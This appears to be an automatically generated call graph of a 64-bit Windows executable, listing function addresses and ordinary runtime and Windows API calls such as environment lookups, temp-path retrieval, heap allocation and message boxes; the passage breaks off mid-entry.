16334->16336 16339 7ff694362910 54 API calls 16335->16339 16337 7ff694361b6f 16336->16337 16338 7ff694361b50 16336->16338 17164 7ff694370180 16337->17164 16340 7ff694374f78 memcpy_s 11 API calls 16338->16340 16339->16346 16342 7ff694361b55 16340->16342 16344 7ff694362910 54 API calls 16342->16344 16344->16346 16345 7ff694362710 54 API calls 16345->16346 16346->16306 16348 7ff694368a2a 16347->16348 16349 7ff694369400 2 API calls 16348->16349 16350 7ff694368a49 GetEnvironmentVariableW 16349->16350 16351 7ff694368a66 ExpandEnvironmentStringsW 16350->16351 16352 7ff694368ab2 16350->16352 16351->16352 16354 7ff694368a88 16351->16354 16353 7ff69436c5c0 _log10_special 8 API calls 16352->16353 16355 7ff694368ac4 16353->16355 16356 7ff6943694b0 2 API calls 16354->16356 16355->16107 16357 7ff694368a9a 16356->16357 16358 7ff69436c5c0 _log10_special 8 API calls 16357->16358 16359 7ff694368aaa 16358->16359 16359->16107 16361 7ff694369400 2 API calls 16360->16361 16362 7ff694368b4c 16361->16362 16363 7ff694369400 2 API calls 16362->16363 16364 7ff694368b5c 16363->16364 17382 7ff6943782a8 16364->17382 16366 7ff694368b6a __std_exception_destroy 16366->16138 16368 7ff6943690f5 16367->16368 17400 7ff694368760 GetCurrentProcess OpenProcessToken 16368->17400 16371 7ff694368760 7 API calls 16372 7ff694369121 16371->16372 16373 7ff69436913a 16372->16373 16374 7ff694369154 16372->16374 16376 7ff6943626b0 48 API calls 16373->16376 16375 7ff6943626b0 48 API calls 16374->16375 16377 7ff694369167 LocalFree LocalFree 16375->16377 16378 7ff694369152 16376->16378 16379 7ff694369183 16377->16379 16381 7ff69436918f 16377->16381 16378->16377 17410 7ff694362b50 16379->17410 16382 7ff69436c5c0 _log10_special 8 API calls 16381->16382 16383 7ff694363c55 16382->16383 16383->16152 16384 7ff694368850 16383->16384 16385 7ff694368868 16384->16385 16386 7ff69436888c 16385->16386 16387 7ff6943688ea GetTempPathW GetCurrentProcessId 16385->16387 16389 7ff694368a20 14 API calls 16386->16389 17419 7ff6943625c0 16387->17419 16391 7ff694368898 16389->16391 16390 7ff694368918 __std_exception_destroy 16402 7ff694368955 __std_exception_destroy 16390->16402 17423 7ff694378bd8 16390->17423 17426 7ff6943681c0 16391->17426 16408 7ff694369400 2 API calls 16402->16408 16416 7ff6943689c4 __std_exception_destroy 16402->16416 16403 7ff69436c5c0 _log10_special 8 API calls 16404 7ff694363cbb 16403->16404 16404->16152 16404->16163 16409 7ff6943689a1 16408->16409 16410 7ff6943689d9 16409->16410 16411 7ff6943689a6 16409->16411 16416->16403 16418 7ff694369422 MultiByteToWideChar 16417->16418 16419 7ff694369446 16417->16419 16418->16419 16421 7ff69436945c __std_exception_destroy 16418->16421 16420 7ff694369463 MultiByteToWideChar 16419->16420 16419->16421 16420->16421 16421->16166 16434 7ff6943633ce memcpy_s 16422->16434 16423 7ff69436c5c0 _log10_special 8 API calls 16425 7ff694363664 16423->16425 16424 7ff6943635c7 16424->16423 16425->16093 16441 7ff6943690c0 LocalFree 16425->16441 16427 7ff694361c80 49 API calls 16427->16434 16428 7ff6943635e2 16430 7ff694362710 54 API calls 16428->16430 16430->16424 16433 7ff6943635c9 16436 7ff694362710 54 API calls 16433->16436 16434->16424 16434->16427 16434->16428 16434->16433 16435 7ff694362a50 54 API calls 16434->16435 16439 7ff6943635d0 16434->16439 17697 7ff694364550 16434->17697 17703 7ff694367e10 16434->17703 17715 7ff694361600 16434->17715 17763 7ff694367110 16434->17763 17767 7ff694364180 16434->17767 17811 7ff694364440 16434->17811 16435->16434 16436->16424 16440 7ff694362710 54 API calls 16439->16440 16440->16424 16443 7ff694361ca5 16442->16443 16444 7ff6943749f4 49 API calls 16443->16444 16445 7ff694361cc8 16444->16445 16445->16102 16447 7ff694369400 2 API calls 16446->16447 16448 7ff694368ba4 16447->16448 16449 7ff6943782a8 38 API calls 16448->16449 16450 7ff694368bb6 __std_exception_destroy 16449->16450 16450->16116 16452 7ff6943645bc 16451->16452 16453 7ff694369400 2 API calls 16452->16453 16454 7ff6943645e4 16453->16454 16455 7ff694369400 2 API calls 16454->16455 16456 7ff6943645f7 16455->16456 18000 7ff694376004 16456->18000 16459 7ff69436c5c0 _log10_special 8 API calls 16460 7ff69436392b 16459->16460 16460->16105 16461 7ff694367f80 16460->16461 16462 7ff694367fa4 16461->16462 16463 7ff694370744 73 API calls 16462->16463 16468 7ff69436807b __std_exception_destroy 16462->16468 16464 7ff694367fc0 16463->16464 16464->16468 18391 7ff694377938 16464->18391 16466 7ff694370744 73 API calls 16469 7ff694367fd5 16466->16469 16467 7ff69437040c _fread_nolock 53 API calls 16467->16469 16468->16109 16469->16466 16469->16467 16469->16468 16471 7ff6943700ec 16470->16471 18406 7ff69436fe98 16471->18406 16473 7ff694370105 16473->16105 16475 7ff69436c8c0 16474->16475 16476 7ff694362734 GetCurrentProcessId 16475->16476 16477 7ff694361c80 49 API calls 16476->16477 16478 7ff694362787 16477->16478 16479 7ff6943749f4 49 API calls 16478->16479 16480 7ff6943627cf 16479->16480 16481 7ff694362620 12 API calls 16480->16481 16482 7ff6943627f1 16481->16482 16483 7ff69436c5c0 _log10_special 8 API calls 16482->16483 16484 7ff694362801 16483->16484 16484->16093 16486 7ff69436c5c9 16485->16486 16487 7ff694363ca7 16486->16487 16488 7ff69436c950 IsProcessorFeaturePresent 16486->16488 16487->16226 16489 7ff69436c968 16488->16489 18417 7ff69436cb48 RtlCaptureContext 16489->18417 16495 7ff694361c80 49 API calls 16494->16495 16496 7ff6943644ed 16495->16496 16496->16146 16498 7ff694361c80 49 API calls 16497->16498 16499 7ff694364650 16498->16499 16499->16163 16499->16499 16501 7ff694366dc5 16500->16501 16502 7ff694363e6c 16501->16502 16503 7ff694374f78 memcpy_s 11 API calls 16501->16503 16506 7ff694367330 16502->16506 16504 7ff694366dd2 16503->16504 16505 7ff694362910 54 API calls 16504->16505 16505->16502 18422 7ff694361470 16506->18422 18528 7ff694366350 16574->18528 16582 7ff694363399 16583 7ff694363670 16582->16583 16604 7ff69437a5cc 16587->16604 16590 7ff69437a8bf 16590->16274 16703 7ff6943754dc EnterCriticalSection 16597->16703 16605 7ff69437a5e8 GetLastError 16604->16605 16606 7ff69437a623 16604->16606 16607 7ff69437a5f8 16605->16607 16606->16590 16610 7ff69437a638 16606->16610 16617 7ff69437b400 16607->16617 16611 7ff69437a66c 16610->16611 16612 7ff69437a654 GetLastError SetLastError 16610->16612 16611->16590 16613 7ff69437a970 IsProcessorFeaturePresent 16611->16613 16612->16611 16614 7ff69437a983 16613->16614 16695 7ff69437a684 16614->16695 16618 7ff69437b43a FlsSetValue 16617->16618 16619 7ff69437b41f FlsGetValue 16617->16619 16620 7ff69437a613 SetLastError 16618->16620 16622 7ff69437b447 16618->16622 16619->16620 16621 7ff69437b434 16619->16621 16620->16606 16621->16618 16634 7ff69437ec08 16622->16634 16625 7ff69437b474 FlsSetValue 16627 7ff69437b492 16625->16627 16628 7ff69437b480 FlsSetValue 16625->16628 16626 7ff69437b464 FlsSetValue 16629 7ff69437b46d 16626->16629 16647 7ff69437af64 16627->16647 16628->16629 16641 7ff69437a9b8 16629->16641 16640 7ff69437ec19 memcpy_s 16634->16640 16635 7ff69437ec6a 16655 7ff694374f78 16635->16655 16636 7ff69437ec4e HeapAlloc 16637 7ff69437b456 16636->16637 16636->16640 16637->16625 16637->16626 16640->16635 16640->16636 16652 7ff694383600 16640->16652 16642 7ff69437a9bd RtlFreeHeap 16641->16642 16646 7ff69437a9ec 16641->16646 16643 7ff69437a9d8 GetLastError 16642->16643 16642->16646 16644 7ff69437a9e5 __free_lconv_mon 16643->16644 16645 7ff694374f78 memcpy_s 9 API calls 16644->16645 16645->16646 16646->16620 16681 7ff69437ae3c 16647->16681 16658 7ff694383640 16652->16658 16664 7ff69437b338 GetLastError 16655->16664 16657 7ff694374f81 16657->16637 16663 7ff694380348 EnterCriticalSection 16658->16663 16665 7ff69437b35c 16664->16665 16666 7ff69437b379 FlsSetValue 16664->16666 16665->16666 16671 7ff69437b369 16665->16671 16667 7ff69437b38b 16666->16667 16666->16671 16669 7ff69437ec08 memcpy_s 5 API calls 16667->16669 16668 7ff69437b3e5 SetLastError 16668->16657 16670 7ff69437b39a 16669->16670 16672 7ff69437b3b8 FlsSetValue 16670->16672 16673 7ff69437b3a8 FlsSetValue 16670->16673 16671->16668 16675 7ff69437b3d6 16672->16675 16676 7ff69437b3c4 FlsSetValue 16672->16676 16674 7ff69437b3b1 16673->16674 16677 7ff69437a9b8 __free_lconv_mon 5 API calls 16674->16677 16678 7ff69437af64 memcpy_s 5 API calls 16675->16678 16676->16674 16677->16671 16679 7ff69437b3de 16678->16679 16680 7ff69437a9b8 __free_lconv_mon 5 API calls 16679->16680 16680->16668 16693 7ff694380348 EnterCriticalSection 16681->16693 16696 7ff69437a6be memcpy_s __FrameHandler3::FrameUnwindToEmptyState 16695->16696 16697 7ff69437a6e6 RtlCaptureContext RtlLookupFunctionEntry 16696->16697 16698 7ff69437a756 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16697->16698 16699 7ff69437a720 RtlVirtualUnwind 16697->16699 16700 7ff69437a7a8 __FrameHandler3::FrameUnwindToEmptyState 16698->16700 16699->16698 16701 7ff69436c5c0 _log10_special 8 API calls 16700->16701 16702 7ff69437a7c7 GetCurrentProcess TerminateProcess 16701->16702 16705 7ff6943636bc GetModuleFileNameW 16704->16705 16705->16278 16705->16279 16707 7ff69436932f FindClose 16706->16707 16708 7ff694369342 16706->16708 16707->16708 16709 7ff69436c5c0 _log10_special 8 API calls 16708->16709 16710 7ff69436371a 16709->16710 16710->16284 16710->16285 16712 7ff69436c8c0 16711->16712 16713 7ff694362c70 GetCurrentProcessId 16712->16713 16742 7ff6943626b0 16713->16742 16715 7ff694362cb9 16746 7ff694374c48 16715->16746 16718 7ff6943626b0 48 API calls 16719 7ff694362d34 FormatMessageW 16718->16719 16721 7ff694362d6d 16719->16721 16722 7ff694362d7f MessageBoxW 16719->16722 16723 7ff6943626b0 48 API calls 16721->16723 16724 7ff69436c5c0 _log10_special 8 API calls 16722->16724 16723->16722 16725 7ff694362daf 16724->16725 16725->16283 16727 7ff694363730 16726->16727 16728 7ff6943693b0 GetFinalPathNameByHandleW CloseHandle 16726->16728 16727->16292 16727->16293 16728->16727 16730 7ff694362834 16729->16730 16731 7ff6943626b0 48 API calls 16730->16731 16732 7ff694362887 16731->16732 16733 7ff694374c48 48 API calls 16732->16733 16734 7ff6943628d0 MessageBoxW 16733->16734 16735 7ff69436c5c0 _log10_special 8 API calls 16734->16735 16736 7ff694362900 16735->16736 16736->16283 16738 7ff6943694da WideCharToMultiByte 16737->16738 16739 7ff694369505 16737->16739 16738->16739 16741 7ff69436951b __std_exception_destroy 16738->16741 16740 7ff694369522 WideCharToMultiByte 16739->16740 16739->16741 16740->16741 16741->16289 16743 7ff6943626d5 16742->16743 16744 7ff694374c48 48 API calls 16743->16744 16745 7ff6943626f8 16744->16745 16745->16715 16750 7ff694374ca2 16746->16750 16747 7ff694374cc7 16748 7ff69437a884 _invalid_parameter_noinfo 37 API calls 16747->16748 16752 7ff694374cf1 16748->16752 16749 7ff694374d03 16764 7ff694373000 16749->16764 16750->16747 16750->16749 16754 7ff69436c5c0 _log10_special 8 API calls 16752->16754 16753 7ff694374de4 16755 7ff69437a9b8 __free_lconv_mon 11 API calls 16753->16755 16756 7ff694362d04 16754->16756 16755->16752 16756->16718 16758 7ff694374e0a 16758->16753 16760 7ff694374e14 16758->16760 16759 7ff694374db9 16761 7ff69437a9b8 __free_lconv_mon 11 API calls 16759->16761 16763 7ff69437a9b8 __free_lconv_mon 11 API calls 16760->16763 16761->16752 16762 7ff694374db0 16762->16753 16762->16759 16763->16752 16765 7ff69437303e 16764->16765 16766 7ff69437302e 16764->16766 16767 7ff694373047 16765->16767 16771 7ff694373075 16765->16771 16769 7ff69437a884 _invalid_parameter_noinfo 37 API calls 16766->16769 16770 7ff69437a884 _invalid_parameter_noinfo 37 API calls 16767->16770 16768 7ff69437306d 16768->16753 16768->16758 16768->16759 16768->16762 16769->16768 16770->16768 16771->16766 16771->16768 16775 7ff694373a14 16771->16775 16808 7ff694373460 16771->16808 16845 7ff694372bf0 16771->16845 16776 7ff694373a56 16775->16776 16777 7ff694373ac7 16775->16777 16778 7ff694373a5c 16776->16778 16779 7ff694373af1 16776->16779 16780 7ff694373acc 16777->16780 16781 7ff694373b20 16777->16781 16782 7ff694373a90 16778->16782 16783 7ff694373a61 16778->16783 16868 7ff694371dc4 16779->16868 16784 7ff694373b01 16780->16784 16785 7ff694373ace 16780->16785 16787 7ff694373b37 16781->16787 16790 7ff694373b2a 16781->16790 16794 7ff694373b2f 16781->16794 16788 7ff694373a67 16782->16788 16782->16794 16783->16787 16783->16788 16875 7ff6943719b4 16784->16875 16789 7ff694373a70 16785->16789 16797 7ff694373add 16785->16797 16882 7ff69437471c 16787->16882 16788->16789 16795 7ff694373aa2 16788->16795 16804 7ff694373a8b 16788->16804 16806 7ff694373b60 16789->16806 16848 7ff6943741c8 16789->16848 16790->16779 16790->16794 16794->16806 16886 7ff6943721d4 16794->16886 16795->16806 16858 7ff694374504 16795->16858 16797->16779 16799 7ff694373ae2 16797->16799 16799->16806 16864 7ff6943745c8 16799->16864 16800 7ff69436c5c0 _log10_special 8 API calls 16802 7ff694373e5a 16800->16802 16802->16771 16804->16806 16807 7ff694373d4c 16804->16807 16893 7ff694374830 16804->16893 16806->16800 16807->16806 16899 7ff69437ea78 16807->16899 16809 7ff694373484 16808->16809 16810 7ff69437346e 16808->16810 16811 7ff6943734c4 16809->16811 16814 7ff69437a884 _invalid_parameter_noinfo 37 API calls 16809->16814 16810->16811 16812 7ff694373a56 16810->16812 16813 7ff694373ac7 16810->16813 16811->16771 16815 7ff694373a5c 16812->16815 16816 7ff694373af1 16812->16816 16817 7ff694373acc 16813->16817 16818 7ff694373b20 16813->16818 16814->16811 16819 7ff694373a90 16815->16819 16820 7ff694373a61 16815->16820 16823 7ff694371dc4 38 API calls 16816->16823 16821 7ff694373b01 16817->16821 16822 7ff694373ace 16817->16822 16824 7ff694373b37 16818->16824 16827 7ff694373b2a 16818->16827 16831 7ff694373b2f 16818->16831 16825 7ff694373a67 16819->16825 16819->16831 16820->16824 16820->16825 16829 7ff6943719b4 38 API calls 16821->16829 16826 7ff694373a70 16822->16826 16834 7ff694373add 16822->16834 16840 7ff694373a8b 16823->16840 16828 7ff69437471c 45 API calls 16824->16828 16825->16826 16832 7ff694373aa2 16825->16832 16825->16840 16830 7ff6943741c8 47 API calls 16826->16830 16843 7ff694373b60 16826->16843 16827->16816 16827->16831 16828->16840 16829->16840 16830->16840 16833 7ff6943721d4 38 API calls 16831->16833 16831->16843 16835 7ff694374504 46 API calls 16832->16835 16832->16843 16833->16840 16834->16816 16836 7ff694373ae2 16834->16836 16835->16840 16838 7ff6943745c8 37 API calls 16836->16838 16836->16843 16837 7ff69436c5c0 _log10_special 8 API calls 16839 7ff694373e5a 16837->16839 16838->16840 16839->16771 16841 7ff694374830 45 API calls 16840->16841 16840->16843 16844 7ff694373d4c 16840->16844 16841->16844 16842 7ff69437ea78 46 API calls 16842->16844 16843->16837 16844->16842 16844->16843 17125 7ff694371038 16845->17125 16849 7ff6943741ee 16848->16849 16911 7ff694370bf0 16849->16911 16854 7ff694374830 45 API calls 16856 7ff694374333 16854->16856 16855 7ff694374830 45 API calls 16857 7ff6943743c1 16855->16857 16856->16855 16856->16856 16856->16857 16857->16804 16859 7ff694374539 16858->16859 16860 7ff694374557 16859->16860 16861 7ff694374830 45 API calls 16859->16861 16863 7ff69437457e 16859->16863 16862 7ff69437ea78 46 API calls 16860->16862 16861->16860 16862->16863 16863->16804 16866 7ff6943745e9 16864->16866 16865 7ff69437a884 _invalid_parameter_noinfo 37 API calls 16867 7ff69437461a 16865->16867 16866->16865 16866->16867 16867->16804 16869 7ff694371df7 16868->16869 16870 7ff694371e26 16869->16870 16872 7ff694371ee3 16869->16872 16874 7ff694371e63 16870->16874 17057 7ff694370c98 16870->17057 16873 7ff69437a884 _invalid_parameter_noinfo 37 API calls 16872->16873 16873->16874 16874->16804 16876 7ff6943719e7 16875->16876 16877 7ff694371a16 16876->16877 16879 7ff694371ad3 16876->16879 16878 7ff694370c98 12 API calls 16877->16878 16881 7ff694371a53 16877->16881 16878->16881 16880 7ff69437a884 _invalid_parameter_noinfo 37 API calls 16879->16880 16880->16881 16881->16804 16883 7ff69437475f 16882->16883 16885 7ff694374763 __crtLCMapStringW 16883->16885 17065 7ff6943747b8 16883->17065 16885->16804 16887 7ff694372207 16886->16887 16888 7ff694372236 16887->16888 16890 7ff6943722f3 16887->16890 16889 7ff694370c98 12 API calls 16888->16889 16892 7ff694372273 16888->16892 16889->16892 16891 7ff69437a884 _invalid_parameter_noinfo 37 API calls 16890->16891 16891->16892 16892->16804 16894 7ff694374847 16893->16894 17069 7ff69437da28 16894->17069 16900 7ff69437eaa9 16899->16900 16908 7ff69437eab7 16899->16908 16901 7ff69437ead7 16900->16901 16902 7ff694374830 45 API calls 16900->16902 16900->16908 16903 7ff69437eae8 16901->16903 16904 7ff69437eb0f 16901->16904 16902->16901 17115 7ff694380110 16903->17115 16906 7ff69437eb9a 16904->16906 16907 7ff69437eb39 16904->16907 16904->16908 16909 7ff69437f910 _fread_nolock MultiByteToWideChar 16906->16909 16907->16908 17118 7ff69437f910 16907->17118 16908->16807 16909->16908 16912 7ff694370c27 16911->16912 16918 7ff694370c16 16911->16918 16912->16918 16941 7ff69437d66c 16912->16941 16915 7ff69437a9b8 __free_lconv_mon 11 API calls 16917 7ff694370c68 16915->16917 16916 7ff69437a9b8 __free_lconv_mon 11 API calls 16916->16918 16917->16916 16919 7ff69437e5e0 16918->16919 16920 7ff69437e5fd 16919->16920 16921 7ff69437e630 16919->16921 16922 7ff69437a884 _invalid_parameter_noinfo 37 API calls 16920->16922 16921->16920 16924 7ff69437e662 16921->16924 16923 7ff694374311 16922->16923 16923->16854 16923->16856 16930 7ff69437e775 16924->16930 16936 7ff69437e6aa 16924->16936 16925 7ff69437e867 16981 7ff69437dacc 16925->16981 16927 7ff69437e82d 16974 7ff69437de64 16927->16974 16929 7ff69437e7fc 16967 7ff69437e144 16929->16967 16930->16925 16930->16927 16930->16929 16932 7ff69437e7bf 16930->16932 16933 7ff69437e7b5 16930->16933 16957 7ff69437e374 16932->16957 16933->16927 16935 7ff69437e7ba 16933->16935 16935->16929 16935->16932 16936->16923 16948 7ff69437a514 16936->16948 16939 7ff69437a970 _isindst 17 API calls 16940 7ff69437e8c4 16939->16940 16942 7ff69437d6b7 16941->16942 16946 7ff69437d67b memcpy_s 16941->16946 16943 7ff694374f78 memcpy_s 11 API calls 16942->16943 16945 7ff694370c54 16943->16945 16944 7ff69437d69e HeapAlloc 16944->16945 16944->16946 16945->16915 16945->16917 16946->16942 16946->16944 16947 7ff694383600 memcpy_s 2 API calls 16946->16947 16947->16946 16949 7ff69437a52b 16948->16949 16950 7ff69437a521 16948->16950 16951 7ff694374f78 memcpy_s 11 API calls 16949->16951 16950->16949 16954 7ff69437a546 16950->16954 16956 7ff69437a532 16951->16956 16953 7ff69437a53e 16953->16923 16953->16939 16954->16953 16955 7ff694374f78 memcpy_s 11 API calls 16954->16955 16955->16956 16990 7ff69437a950 16956->16990 16993 7ff69438411c 16957->16993 16961 7ff69437e41c 16962 7ff69437e420 16961->16962 16963 7ff69437e471 16961->16963 16964 7ff69437e43c 16961->16964 16962->16923 17046 7ff69437df60 16963->17046 17042 7ff69437e21c 16964->17042 16968 7ff69438411c 38 API calls 16967->16968 16969 7ff69437e18e 16968->16969 16970 7ff694383b64 37 API calls 16969->16970 16971 7ff69437e1de 16970->16971 16972 7ff69437e1e2 16971->16972 16973 7ff69437e21c 45 API calls 16971->16973 16972->16923 16973->16972 16975 7ff69438411c 38 API calls 16974->16975 16976 7ff69437deaf 16975->16976 16977 7ff694383b64 37 API calls 16976->16977 16978 7ff69437df07 16977->16978 16979 7ff69437df0b 16978->16979 16980 7ff69437df60 45 API calls 16978->16980 16979->16923 16980->16979 16982 7ff69437db44 16981->16982 16983 7ff69437db11 16981->16983 16985 7ff69437db5c 16982->16985 16987 7ff69437dbdd 16982->16987 16984 7ff69437a884 _invalid_parameter_noinfo 37 API calls 16983->16984 16989 7ff69437db3d memcpy_s 16984->16989 16986 7ff69437de64 46 API calls 16985->16986 16986->16989 16988 7ff694374830 45 API calls 16987->16988 16987->16989 16988->16989 16989->16923 16991 7ff69437a7e8 _invalid_parameter_noinfo 37 API calls 16990->16991 16992 7ff69437a969 16991->16992 16992->16953 16994 7ff69438416f fegetenv 16993->16994 16995 7ff694387e9c 37 API calls 16994->16995 16999 7ff6943841c2 16995->16999 16996 7ff6943841ef 17001 7ff69437a514 __std_exception_copy 37 API calls 16996->17001 16997 7ff6943842b2 16998 7ff694387e9c 37 API calls 16997->16998 17000 7ff6943842dc 16998->17000 16999->16997 17002 7ff69438428c 16999->17002 17003 7ff6943841dd 16999->17003 17004 7ff694387e9c 37 API calls 17000->17004 17005 7ff69438426d 17001->17005 17008 7ff69437a514 __std_exception_copy 37 API calls 17002->17008 17003->16996 17003->16997 17006 7ff6943842ed 17004->17006 17007 7ff694385394 17005->17007 17012 7ff694384275 17005->17012 17009 7ff694388090 20 API calls 17006->17009 17010 7ff69437a970 _isindst 17 API calls 17007->17010 17008->17005 17020 7ff694384356 memcpy_s 17009->17020 17011 7ff6943853a9 17010->17011 17013 7ff69436c5c0 _log10_special 8 API calls 17012->17013 17014 7ff69437e3c1 17013->17014 17038 7ff694383b64 17014->17038 17015 7ff6943846ff memcpy_s 17016 7ff694384a3f 17018 7ff694383c80 37 API calls 17016->17018 17017 7ff694384397 memcpy_s 17033 7ff694384cdb memcpy_s 17017->17033 17037 7ff6943847f3 memcpy_s 17017->17037 17024 7ff694385157 17018->17024 17019 7ff6943849eb 17019->17016 17021 7ff6943853ac memcpy_s 37 API calls 17019->17021 17020->17015 17020->17017 17022 7ff694374f78 memcpy_s 11 API calls 17020->17022 17021->17016 17023 7ff6943847d0 17022->17023 17025 7ff69437a950 _invalid_parameter_noinfo 37 API calls 17023->17025 17027 7ff6943853ac memcpy_s 37 API calls 17024->17027 17035 7ff6943851b2 17024->17035 17025->17017 17026 7ff694385338 17028 7ff694387e9c 37 API calls 17026->17028 17027->17035 17028->17012 17029 7ff694374f78 11 API calls memcpy_s 17029->17037 17030 7ff694374f78 11 API calls memcpy_s 17030->17033 17031 7ff694383c80 37 API calls 17031->17035 17032 7ff69437a950 37 API calls _invalid_parameter_noinfo 17032->17037 17033->17016 17033->17019 17033->17030 17036 7ff69437a950 37 API calls _invalid_parameter_noinfo 17033->17036 17034 7ff6943853ac memcpy_s 37 API calls 17034->17035 17035->17026 17035->17031 17035->17034 17036->17033 17037->17019 17037->17029 17037->17032 17039 7ff694383b83 17038->17039 17040 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17039->17040 17041 7ff694383bae memcpy_s 17039->17041 17040->17041 17041->16961 17043 7ff69437e248 memcpy_s 17042->17043 17044 7ff694374830 45 API calls 17043->17044 17045 7ff69437e302 memcpy_s 17043->17045 17044->17045 17045->16962 17047 7ff69437df9b 17046->17047 17051 7ff69437dfe8 memcpy_s 17046->17051 17048 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17047->17048 17049 7ff69437dfc7 17048->17049 17049->16962 17050 7ff69437e053 17052 7ff69437a514 __std_exception_copy 37 API calls 17050->17052 17051->17050 17053 7ff694374830 45 API calls 17051->17053 17056 7ff69437e095 memcpy_s 17052->17056 17053->17050 17054 7ff69437a970 _isindst 17 API calls 17055 7ff69437e140 17054->17055 17056->17054 17058 7ff694370ccf 17057->17058 17059 7ff694370cbe 17057->17059 17058->17059 17060 7ff69437d66c _fread_nolock 12 API calls 17058->17060 17059->16874 17061 7ff694370d00 17060->17061 17062 7ff694370d14 17061->17062 17064 7ff69437a9b8 __free_lconv_mon 11 API calls 17061->17064 17063 7ff69437a9b8 __free_lconv_mon 11 API calls 17062->17063 17063->17059 17064->17062 17066 7ff6943747d6 17065->17066 17067 7ff6943747de 17065->17067 17068 7ff694374830 45 API calls 17066->17068 17067->16885 17068->17067 17070 7ff69437da41 17069->17070 17072 7ff69437486f 17069->17072 17070->17072 17077 7ff694383374 17070->17077 17073 7ff69437da94 17072->17073 17074 7ff69437daad 17073->17074 17075 7ff69437487f 17073->17075 17074->17075 17112 7ff6943826c0 17074->17112 17075->16807 17089 7ff69437b1c0 GetLastError 17077->17089 17080 7ff6943833ce 17080->17072 17090 7ff69437b1e4 FlsGetValue 17089->17090 17091 7ff69437b201 FlsSetValue 17089->17091 17092 7ff69437b1fb 17090->17092 17108 7ff69437b1f1 17090->17108 17093 7ff69437b213 17091->17093 17091->17108 17092->17091 17095 7ff69437ec08 memcpy_s 11 API calls 17093->17095 17094 7ff69437b26d SetLastError 17097 7ff69437b28d 17094->17097 17098 7ff69437b27a 17094->17098 17096 7ff69437b222 17095->17096 17099 7ff69437b240 FlsSetValue 17096->17099 17100 7ff69437b230 FlsSetValue 17096->17100 17101 7ff69437a574 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 17097->17101 17098->17080 17111 7ff694380348 EnterCriticalSection 17098->17111 17103 7ff69437b24c FlsSetValue 17099->17103 17104 7ff69437b25e 17099->17104 17102 7ff69437b239 17100->17102 17105 7ff69437b292 17101->17105 17106 7ff69437a9b8 __free_lconv_mon 11 API calls 17102->17106 17103->17102 17107 7ff69437af64 memcpy_s 11 API calls 17104->17107 17106->17108 17109 7ff69437b266 17107->17109 17108->17094 17110 7ff69437a9b8 __free_lconv_mon 11 API calls 17109->17110 17110->17094 17113 7ff69437b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17112->17113 17114 7ff6943826c9 17113->17114 17121 7ff694386df8 17115->17121 17120 7ff69437f919 MultiByteToWideChar 17118->17120 17123 7ff694386e5c 17121->17123 17122 7ff69436c5c0 _log10_special 8 API calls 17124 7ff69438012d 17122->17124 17123->17122 17124->16908 17126 7ff69437106d 17125->17126 17127 7ff69437107f 17125->17127 17128 7ff694374f78 memcpy_s 11 API calls 17126->17128 17130 7ff69437108d 17127->17130 17133 7ff6943710c9 17127->17133 17129 7ff694371072 17128->17129 17131 7ff69437a950 _invalid_parameter_noinfo 37 API calls 17129->17131 17132 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17130->17132 17139 7ff69437107d 17131->17139 17132->17139 17134 7ff694371445 17133->17134 17136 7ff694374f78 memcpy_s 11 API calls 17133->17136 17135 7ff694374f78 memcpy_s 11 API calls 17134->17135 17134->17139 17137 7ff6943716d9 17135->17137 17138 7ff69437143a 17136->17138 17140 7ff69437a950 _invalid_parameter_noinfo 37 API calls 17137->17140 17141 7ff69437a950 _invalid_parameter_noinfo 37 API calls 17138->17141 17139->16771 17140->17139 17141->17134 17143 7ff694370774 17142->17143 17170 7ff6943704d4 17143->17170 17145 7ff69437078d 17145->16307 17182 7ff69437042c 17146->17182 17150 7ff69436c8c0 17149->17150 17151 7ff694362930 GetCurrentProcessId 17150->17151 17152 7ff694361c80 49 API calls 17151->17152 17153 7ff694362979 17152->17153 17196 7ff6943749f4 17153->17196 17158 7ff694361c80 49 API calls 17159 7ff6943629ff 17158->17159 17226 7ff694362620 17159->17226 17162 7ff69436c5c0 _log10_special 8 API calls 17163 7ff694362a31 17162->17163 17163->16346 17165 7ff694370189 17164->17165 17169 7ff694361b89 17164->17169 17166 7ff694374f78 memcpy_s 11 API calls 17165->17166 17167 7ff69437018e 17166->17167 17168 7ff69437a950 _invalid_parameter_noinfo 37 API calls 17167->17168 17168->17169 17169->16345 17169->16346 17171 7ff69437053e 17170->17171 17172 7ff6943704fe 17170->17172 17171->17172 17173 7ff69437054a 17171->17173 17174 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17172->17174 17181 7ff6943754dc EnterCriticalSection 17173->17181 17176 7ff694370525 17174->17176 17176->17145 17183 7ff694370456 17182->17183 17184 7ff694361a20 17182->17184 17183->17184 17185 7ff694370465 memcpy_s 17183->17185 17186 7ff6943704a2 17183->17186 17184->16314 17184->16315 17189 7ff694374f78 memcpy_s 11 API calls 17185->17189 17195 7ff6943754dc EnterCriticalSection 17186->17195 17191 7ff69437047a 17189->17191 17193 7ff69437a950 _invalid_parameter_noinfo 37 API calls 17191->17193 17193->17184 17199 7ff694374a4e 17196->17199 17197 7ff694374a73 17198 7ff69437a884 _invalid_parameter_noinfo 37 API calls 17197->17198 17202 7ff694374a9d 17198->17202 17199->17197 17200 7ff694374aaf 17199->17200 17235 7ff694372c80 17200->17235 17204 7ff69436c5c0 _log10_special 8 API calls 17202->17204 17203 7ff694374b8c 17205 7ff69437a9b8 __free_lconv_mon 11 API calls 17203->17205 17207 7ff6943629c3 17204->17207 17205->17202 17214 7ff6943751d0 17207->17214 17208 7ff694374bb0 17208->17203 17209 7ff694374bba 17208->17209 17212 7ff69437a9b8 __free_lconv_mon 11 API calls 17209->17212 17210 7ff69437a9b8 __free_lconv_mon 11 API calls 17210->17202 17211 7ff694374b58 17211->17203 17213 7ff694374b61 17211->17213 17212->17202 17213->17210 17215 7ff69437b338 memcpy_s 11 API calls 17214->17215 17216 7ff6943751e7 17215->17216 17217 7ff6943629e5 17216->17217 17218 7ff69437ec08 memcpy_s 11 API calls 17216->17218 17221 7ff694375227 17216->17221 17217->17158 17219 7ff69437521c 17218->17219 17220 7ff69437a9b8 __free_lconv_mon 11 API calls 17219->17220 17220->17221 17221->17217 17373 7ff69437ec90 17221->17373 17224 7ff69437a970 _isindst 17 API calls 17225 